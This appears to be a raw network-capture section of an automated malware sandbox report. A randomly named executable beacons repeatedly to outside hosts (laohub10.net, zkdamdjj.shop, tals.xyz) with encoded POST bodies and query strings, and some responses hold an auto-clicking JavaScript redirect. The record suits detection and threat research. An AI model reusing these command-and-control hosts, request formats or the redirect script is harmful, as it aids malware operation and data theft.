                                                                              Jan 11, 2025 09:28:33.767959118 CET533INHTTP/1.1 200 OK
                                                                              Server: Apache
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Accept-Ranges: bytes
                                                                              Cache-Control: max-age=86400
                                                                              Age: 1
                                                                              Connection: Close
                                                                              Content-Length: 358
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.849999202.79.161.151803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:35.511471987 CET651OUTPOST /36be/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.laohub10.net
                                                                              Origin: http://www.laohub10.net
                                                                              Referer: http://www.laohub10.net/36be/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 2b 4b 62 66 35 33 32 78 77 4c 39 5a 31 64 71 39 42 38 69 73 37 33 47 50 79 73 38 75 41 73 38 41 65 71 2f 6e 4f 4a 42 4f 34 2b 30 77 56 47 77 76 6a 4a 63 53 79 33 36 4f 7a 30 69 65 4c 70 4e 64 70 36 55 4f 41 46 4e 37 53 6e 5a 6e 33 55 33 47 66 70 6a 52 71 61 71 53 59 77 35 7a 53 62 74 77 36 78 43 65 66 68 76 31 65 4d 61 38 6d 30 4c 6d 72 67 43 48 59 57 4c 32 34 77 74 49 4d 75 70 39 71 53 2f 59 64 75 76 2f 43 76 59 4b 64 5a 61 42 59 62 63 78 70 62 67 4e 4b 7a 33 6d 41 78 45 6c 79 34 69 6e 69 49 45 41 36 34 43 7a 76 48 57 47 33 6b
                                                                              Data Ascii: DzLTc=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBn+Kbf532xwL9Z1dq9B8is73GPys8uAs8Aeq/nOJBO4+0wVGwvjJcSy36Oz0ieLpNdp6UOAFN7SnZn3U3GfpjRqaqSYw5zSbtw6xCefhv1eMa8m0LmrgCHYWL24wtIMup9qS/Yduv/CvYKdZaBYbcxpbgNKz3mAxEly4iniIEA64CzvHWG3k
                                                                              Jan 11, 2025 09:28:36.313288927 CET533INHTTP/1.1 200 OK
                                                                              Server: Apache
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Accept-Ranges: bytes
                                                                              Cache-Control: max-age=86400
                                                                              Age: 1
                                                                              Connection: Close
                                                                              Content-Length: 358
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.850000202.79.161.151803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:38.059536934 CET1668OUTPOST /36be/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.laohub10.net
                                                                              Origin: http://www.laohub10.net
                                                                              Referer: http://www.laohub10.net/36be/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 47 4b 62 6f 52 33 31 57 63 4c 38 5a 31 64 6a 64 42 39 69 73 37 32 47 50 4b 6f 38 75 46 62 38 43 6d 71 2b 46 32 4a 51 4d 41 2b 76 67 56 47 74 2f 6a 55 59 53 79 59 36 4f 6a 34 69 61 58 70 4e 64 70 36 55 4e 6f 46 4e 71 53 6e 4a 58 33 54 67 32 66 74 6f 78 71 79 71 53 41 67 35 79 6e 6d 74 6a 79 78 44 2b 50 68 6a 68 2b 4d 46 4d 6d 71 47 47 72 47 43 48 64 47 4c 32 55 57 74 4a 34 45 70 36 47 53 2b 63 38 33 71 74 44 30 62 73 52 59 63 67 59 39 63 32 49 2f 72 73 36 49 36 68 6f 49 43 43 47 30 30 48 47 61 4a 67 7a 73 59 6b 75 57 65 79 57 45 64 43 45 6f 2b 36 58 30 34 42 33 39 6e 75 4e 56 39 33 41 58 76 41 33 55 33 51 43 43 53 74 78 42 59 36 4b 54 56 4b 4d 35 38 31 7a 4c 68 73 38 46 34 42 30 77 73 53 69 66 4d 76 71 6b 67 43 61 67 75 4f 69 68 77 77 42 54 53 48 66 30 4b 35 4a 71 77 61 76 5a 70 59 68 4b 63 6d 79 54 7a 4b 54 57 78 33 4d 51 54 48 6e 4e 6a 49 32 54 42 67 2b 6d [TRUNCATED]
                                                                              Data Ascii: DzLTc=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBnGKboR31WcL8Z1djdB9is72GPKo8uFb8Cmq+F2JQMA+vgVGt/jUYSyY6Oj4iaXpNdp6UNoFNqSnJX3Tg2ftoxqyqSAg5ynmtjyxD+Phjh+MFMmqGGrGCHdGL2UWtJ4Ep6GS+c83qtD0bsRYcgY9c2I/rs6I6hoICCG00HGaJgzsYkuWeyWEdCEo+6X04B39nuNV93AXvA3U3QCCStxBY6KTVKM581zLhs8F4B0wsSifMvqkgCaguOihwwBTSHf0K5JqwavZpYhKcmyTzKTWx3MQTHnNjI2TBg+mk9lg3IAryk6EFMubuvJYay1Ag3fLMuABsYQ4hl8lNQGF7TvjZvkr96kvqSc/h5e1TrjZQwd4FcrA1aLAHMa0fa4nmFfEaDpFariHc6epeSKR+MSWgM8pWyaQN9rRFcaZ0L0/t+8NacAL7h7PIC7mVpKI1zIWgnKZft0qRTbO/fSzB5GVM0U5oRxM5ZLE75Z7k+W+P+tCsQHuxjMkR4CJPT9r8dUYKGDfoGOCsT/3Mbjsns1sunQBWhXkCwATR+O47IdVxutjFpDMMH3fEp80Tb6kN6IpmQmuWDkTknVkZZJkFCP1v3vtfDDZFfUhBQONCMnJF0VD0lmuj4gSGV4xVj/jo9KmxTO5z+f46BEi+sKgsMXyyadvPmeziY87y+yy8NXhbmiGJUIgclyMPSOBeUqxRD2+jDujfBgcBYOSwXSz5lCh+UCcW/tLAdcwAVrrwBlQWTYuq3j0n8WsfPrC1DUGxmzz6dpz9gC7Nd2lUpx7Iqf+9U249C7HOxVqCDBvLYkGyGp1nq3SY4+2CCvkluxf+6fPTQR/dEoT7k95RFYuZ2dOqBMca6oZGUzDvlVSrGgh5VGHv8dtVWX/1fhtiLijWvW2j6b5ModvayGeLxE8YrJorSKDgj+Y1V0XxR4ck8VTd2YoFWpDtEkdwIGC7loptEPSosRKwi [TRUNCATED]
                                                                              Jan 11, 2025 09:28:38.892605066 CET533INHTTP/1.1 200 OK
                                                                              Server: Apache
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Accept-Ranges: bytes
                                                                              Cache-Control: max-age=86400
                                                                              Age: 1
                                                                              Connection: Close
                                                                              Content-Length: 358
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.850001202.79.161.151803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:40.632839918 CET376OUTGET /36be/?m8=urJ0WtmP0FPTTB&DzLTc=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rC5vzNz0ZFCw8d/R3+K3cKRBUeMTJLe+XGej8HjBlTXN1Q== HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.laohub10.net
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:28:41.467186928 CET533INHTTP/1.1 200 OK
                                                                              Server: Apache
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Accept-Ranges: bytes
                                                                              Cache-Control: max-age=86400
                                                                              Age: 1
                                                                              Connection: Close
                                                                              Content-Length: 358
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.850002188.114.97.3803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:46.607239008 CET634OUTPOST /kf1m/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.zkdamdjj.shop
                                                                              Origin: http://www.zkdamdjj.shop
                                                                              Referer: http://www.zkdamdjj.shop/kf1m/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 4a 31 63 58 48 65 4e 38 6e 34 79 33 37 51 49 45 50 47 61 42 49 46 48 4c 5a 73 31 35 67 62 67 73 4c 34 74 56 47 5a 4d 30 4c 7a 58 31 48 71 66 70 38 6e 31 66 52 64 52 59 42 4f 7a 39 41 33 4e 44 2f 70 5a 32 6b 30 4a 66 49 53 58 66 63 42 49 71 67 34 5a 74 2b 32 6c 4f 6a 54 6c 4a 4a 4c 77 49 4e 38 63 77 31 33 52 75 73 39 36 51 76 70 2f 7a 35 48 67 42 4b 6a 2b 67 63 36 6a 6f 4f 6e 67 4a 79 63 63 66 61 42 75 43 49 34 53 63 57 43 51 30 36 75 53 36 53 43 55 2f 53 61 65 56 50 73 56 67 74 4a 53 38 64 41 37 35 74 70 6f 38 4a 72 4a 54 48 62 46 57 6c 63 38 54 64 67 3d
                                                                              Data Ascii: DzLTc=tBXlMSkIxJ8XDJ1cXHeN8n4y37QIEPGaBIFHLZs15gbgsL4tVGZM0LzX1Hqfp8n1fRdRYBOz9A3ND/pZ2k0JfISXfcBIqg4Zt+2lOjTlJJLwIN8cw13Rus96Qvp/z5HgBKj+gc6joOngJyccfaBuCI4ScWCQ06uS6SCU/SaeVPsVgtJS8dA75tpo8JrJTHbFWlc8Tdg=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.850003188.114.97.3803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:49.157284975 CET654OUTPOST /kf1m/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.zkdamdjj.shop
                                                                              Origin: http://www.zkdamdjj.shop
                                                                              Referer: http://www.zkdamdjj.shop/kf1m/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 2f 67 74 75 63 74 57 45 78 4d 33 4c 7a 58 2b 6e 72 30 30 73 6e 69 66 52 5a 6a 59 44 71 7a 39 45 6e 4e 44 2b 5a 5a 78 58 4d 49 65 59 53 56 58 38 42 4f 6b 41 34 5a 74 2b 32 6c 4f 6a 75 4f 4a 4a 54 77 49 5a 41 63 68 6b 33 57 74 73 39 6c 56 76 70 2f 33 35 48 6b 42 4b 69 72 67 64 57 64 6f 4d 76 67 4a 32 4d 63 65 4f 31 74 52 6f 34 51 44 47 44 62 35 4a 72 34 69 53 6d 58 6a 7a 58 39 52 2f 77 31 68 62 34 34 6d 2f 49 39 36 74 42 44 38 4b 44 2f 57 77 47 74 4d 47 4d 4d 4e 4b 32 35 45 67 34 2b 31 70 71 58 73 39 4e 49 58 45 45 51 75 31 41 6c
                                                                              Data Ascii: DzLTc=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T/gtuctWExM3LzX+nr00snifRZjYDqz9EnND+ZZxXMIeYSVX8BOkA4Zt+2lOjuOJJTwIZAchk3Wts9lVvp/35HkBKirgdWdoMvgJ2MceO1tRo4QDGDb5Jr4iSmXjzX9R/w1hb44m/I96tBD8KD/WwGtMGMMNK25Eg4+1pqXs9NIXEEQu1Al


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.850004188.114.97.3803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:51.702677011 CET1671OUTPOST /kf1m/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.zkdamdjj.shop
                                                                              Origin: http://www.zkdamdjj.shop
                                                                              Referer: http://www.zkdamdjj.shop/kf1m/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 33 67 74 59 51 74 55 6c 78 4d 32 4c 7a 58 33 48 71 54 30 73 6d 67 66 52 67 71 59 44 57 4a 39 43 37 4e 43 63 52 5a 77 6d 4d 49 55 59 53 56 49 73 42 4c 71 67 35 45 74 2b 6e 73 4f 69 43 4f 4a 4a 54 77 49 66 6b 63 68 31 33 57 72 73 39 36 51 76 70 4a 7a 35 48 41 42 4b 37 63 67 64 6a 6d 30 76 58 67 4b 57 63 63 63 39 64 74 4c 6f 34 57 43 47 43 62 35 4f 6a 6a 69 53 71 74 6a 79 53 53 52 39 67 31 73 65 6c 66 39 64 63 6d 6f 62 74 66 30 4c 48 55 66 51 53 30 47 6b 38 48 48 4b 43 6b 45 55 67 47 35 4b 53 55 6c 74 41 55 49 78 63 45 6e 68 74 76 56 53 4a 77 7a 69 6c 36 53 52 36 46 4a 36 78 31 35 66 50 4b 79 34 46 66 66 63 70 4b 36 68 63 62 31 56 75 6f 7a 46 31 49 4a 31 37 72 77 47 6a 2f 4a 2b 32 44 39 39 59 6d 4b 70 32 42 77 64 62 4b 34 47 38 63 47 55 4d 4e 57 46 6a 4a 7a 6f 61 4c 56 50 58 45 4b 6a 2b 53 79 54 56 41 75 59 70 49 79 44 69 71 53 68 30 62 35 47 6c 70 42 37 56 41 [TRUNCATED]
                                                                              Data Ascii: DzLTc=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T3gtYQtUlxM2LzX3HqT0smgfRgqYDWJ9C7NCcRZwmMIUYSVIsBLqg5Et+nsOiCOJJTwIfkch13Wrs96QvpJz5HABK7cgdjm0vXgKWccc9dtLo4WCGCb5OjjiSqtjySSR9g1self9dcmobtf0LHUfQS0Gk8HHKCkEUgG5KSUltAUIxcEnhtvVSJwzil6SR6FJ6x15fPKy4FffcpK6hcb1VuozF1IJ17rwGj/J+2D99YmKp2BwdbK4G8cGUMNWFjJzoaLVPXEKj+SyTVAuYpIyDiqSh0b5GlpB7VAhDsHO07fivWF0h7d3lPjJst98+w9h/BAcpUEXB18/+05nZaoR1Fy9E1VURXpMw5hkC1AJnuo7nP/0QkcbZFGfH8sKZd+0T48KZFkL81XPE3f63UV3T+SvZJWI/IqM39R++SfHxQLRpS30tW74SkLfXGYLoHvazjRIL14GgSlTuAk4CkDX+z6opO5sjZ0hppXJFqYTDR0KR6m0naYlaRwKawsjtNVg8tjLWHinw1CeWU6rv9aS8OtpAd9HEqn8hrTdElo4NaU45JRSoru3su0TIU92ZsZK5ECRDozWaDnSyYBTD81vaxGqkF+TM6I5Umpoqu56zEXPcKpNbZgIUgbG1P9f7iXWEWIysxSuYzLDqIG3/iDTBsNJbp8kUlHsWeoQ1/zrlrLqjZczPdL8W3hyp9K22oUS5x3j8LlFqso9HRUI0fXmoCrt4AJRmVYXrzaG5+YqcwywG/iwGO+RnaXPXROb33NPUxkWoMLG6iO9XN03k7v1KyJfJhVGQBmMRTQpdHr2Hw+P61TsuC1Gf1b2IM1MmD9zmoHg+NGmIjm+0C+3qf/1Zf9KmG93JcUkVa4jefDIDCbfkQx+aTVW4hfwa8LP5lU3XXlid/DElUYkAH0EJ+z68vTY5EfpkaRbApve2iTPboE9n0CfuYCNHRA6WyLTtj6ajncVf [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.850005188.114.97.3803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:54.242649078 CET377OUTGET /kf1m/?DzLTc=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXOKBKPZyn2cike7Ub3qNJZbDUNl9s1XUkaYGScVYwZ61FA==&m8=urJ0WtmP0FPTTB HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.zkdamdjj.shop
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:29:33.788362980 CET966INHTTP/1.1 522
                                                                              Date: Sat, 11 Jan 2025 08:29:33 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 15
                                                                              Connection: close
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kiS27%2BRCotCSBtiHG%2BcvRr%2B8qkxa8SFgh7W0qPXetOwF4PiiKFuxuqeIKZTNcw%2FLOcLUSN3RfXYyFzXIialM4ZbT%2FvThbZLQq7sfqK98PCPXNgaBWgFWzKyxdi%2Bw5oizVDJMQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Referrer-Policy: same-origin
                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 9003893978cc7274-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1971&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=377&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                              Data Ascii: error code: 522


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.85000613.248.169.48803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:29:38.839350939 CET619OUTPOST /k1td/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.tals.xyz
                                                                              Origin: http://www.tals.xyz
                                                                              Referer: http://www.tals.xyz/k1td/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
